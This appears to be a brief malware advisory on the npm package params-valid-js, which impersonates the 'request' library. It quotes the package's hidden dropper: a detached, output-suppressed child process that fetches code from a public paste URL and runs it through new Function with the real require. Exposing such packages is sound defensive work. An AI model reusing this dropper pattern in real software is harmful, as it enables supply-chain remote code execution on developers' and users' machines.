params-valid-js impersonates the well-known request package (copies Mikeal Rogers' Apache-2.0 header, points bugs URL to github.com/request/request/issues, replicates request's API surface) while shipping a remote-code dropper. index.js exports a function shaped like Express middleware ((req,res,next)=>next()) as module.exports, default, and reqValidator. When invoked, the middleware calls swapJson(...) which spawns node lib/callers.js with { detached: true, stdio: 'ignore' } and child.unref() — concealing all output. lib/callers.js then performs axios.get('https://www.jsonkeeper.com/b/5IZTJ'), extracts data.Cookie, and executes the response body with new Function.constructor('require', s); handler(require);, passing the real require into the fetched code. jsonkeeper.com is an anonymous, mutable public paste host, so the attacker can swap in arbitrary Node-privileged payloads at any time. Any application that wires this lookalike into its HTTP stack triggers arbitrary remote code execution on the host.